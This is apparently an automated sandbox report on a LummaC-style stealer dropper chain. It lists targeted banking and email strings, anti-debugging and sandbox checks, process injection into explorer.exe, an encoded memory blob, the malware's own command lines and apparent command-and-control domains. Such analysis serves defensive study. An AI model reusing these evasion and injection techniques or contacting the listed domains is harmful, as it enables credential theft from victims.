                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                          Source: svchost.exe, 0000002B.00000003.3324377603.00000000053D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                          Source: PING.EXE, 00000026.00000002.3234695145.000001A3597ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                          Source: 5639a58f3b.exe, 0000000A.00000002.3384325598.00000000038C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                          Source: svchost.exe, 0000002B.00000003.3324377603.00000000053D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                          Source: file.exe, 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmp, 1459165c97.exe, 0000002A.00000002.3344580195.0000000001183000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                          Source: file.exe, 00000000.00000000.2117496625.000000000119B000.00000080.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000000.2148680482.00000000007FB000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000000.2162876849.00000000007FB000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000000.2804508854.00000000007FB000.00000080.00000001.01000000.00000007.sdmpBinary or memory string: \\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeAPI call chain: ExitProcess graph end nodegraph_8-14619
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Hides threads from debuggers
                          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeThread information set: HideFromDebugger
                          Tries to detect sandboxes and other dynamic analysis tools (window names)
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeOpen window title or class name: regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeOpen window title or class name: gbdyllo
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeOpen window title or class name: procmon_window_class
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeOpen window title or class name: ollydbg
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeOpen window title or class name: filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeFile opened: NTICE
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeFile opened: SICE
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeFile opened: SIWVID
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\explorer.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05090C6E rdtsc 0_2_05090C6E
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_0043A920 LdrInitializeThunk,10_2_0043A920
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00D95020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00D95020
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE652B mov eax, dword ptr fs:[00000030h]0_2_00FE652B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FEA302 mov eax, dword ptr fs:[00000030h]0_2_00FEA302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_0064A302 mov eax, dword ptr fs:[00000030h]2_2_0064A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_0064652B mov eax, dword ptr fs:[00000030h]2_2_0064652B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_0064A302 mov eax, dword ptr fs:[00000030h]3_2_0064A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_0064652B mov eax, dword ptr fs:[00000030h]3_2_0064652B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0064A302 mov eax, dword ptr fs:[00000030h]6_2_0064A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0064652B mov eax, dword ptr fs:[00000030h]6_2_0064652B
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00DB519E mov edi, dword ptr fs:[00000030h]8_2_00DB519E
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00D91614 mov edi, dword ptr fs:[00000030h]8_2_00D91614
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00D91614 mov edi, dword ptr fs:[00000030h]10_2_00D91614
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00D9FE2C GetProcessHeap,8_2_00D9FE2C
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00D95014 SetUnhandledExceptionFilter,8_2_00D95014
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00D95020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00D95020
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00D9B4B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00D9B4B9
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00D94C64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00D94C64
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00D95014 SetUnhandledExceptionFilter,10_2_00D95014
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00D95020 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00D95020
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00D9B4B9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00D9B4B9
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00D94C64 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00D94C64

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Contains functionality to inject code into remote processes
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00DB519E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,8_2_00DB519E
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeMemory written: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeMemory written: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe base: 400000 value starts with: 4D5AJump to behavior
                          Injects code into the Windows Explorer (explorer.exe)
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 1048 base: 140000000 value: 4D
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 1048 base: 140001000 value: 40
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 1048 base: 1402DD000 value: 58
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 1048 base: 14040B000 value: A4
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 1048 base: 140739000 value: 00
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 1048 base: 14075E000 value: 48
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 1048 base: 14075F000 value: 48
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 1048 base: 140762000 value: 48
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 1048 base: 140764000 value: 00
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 1048 base: 140765000 value: 00
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeMemory written: PID: 1048 base: EEF010 value: 00
                          LummaC encrypted strings found
                          Source: 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                          Source: 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                          Source: 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                          Source: 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                          Source: 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                          Source: 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                          Source: 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                          Source: 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                          Source: 5639a58f3b.exe, 00000008.00000002.2963455814.000000000098E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sweepyribs.lat
                          Source: 850609077b.exe, 0000000B.00000002.3026991513.0000000000D81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pancakedipyps.click
                          Modifies the context of a thread in another process (thread injection)
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeThread register set: target process: 1048
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe "C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe "C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe "C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe "C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeProcess created: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe "C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeProcess created: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe "C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                          Source: 1459165c97.exe, 0000002A.00000002.3344580195.0000000001183000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: Program Manager
                          Source: file.exe, 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: ocFUProgram Manager
                          Source: skotes.exe, skotes.exe, 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: cFUProgram Manager
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_0062DD91 cpuid 6_2_0062DD91
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: GetLocaleInfoW,8_2_00DA30D1
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: EnumSystemLocalesW,8_2_00DA3086
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_00DA3178
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: GetLocaleInfoW,8_2_00DA327E
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: GetLocaleInfoW,8_2_00D9F21C
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00DA2A13
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00DA2CFF
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: EnumSystemLocalesW,8_2_00DA2C64
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: GetLocaleInfoW,8_2_00DA2FB1
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: EnumSystemLocalesW,8_2_00DA2F52
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: EnumSystemLocalesW,8_2_00D9F717
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: GetLocaleInfoW,10_2_00DA30D1
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: EnumSystemLocalesW,10_2_00DA3086
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_00DA3178
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: GetLocaleInfoW,10_2_00DA327E
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: GetLocaleInfoW,10_2_00D9F21C
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_00DA2A13
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_00DA2CFF
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: EnumSystemLocalesW,10_2_00DA2C64
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: GetLocaleInfoW,10_2_00DA2FB1
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: EnumSystemLocalesW,10_2_00DA2F52
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: EnumSystemLocalesW,10_2_00D9F717
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe VolumeInformationJump to behavior
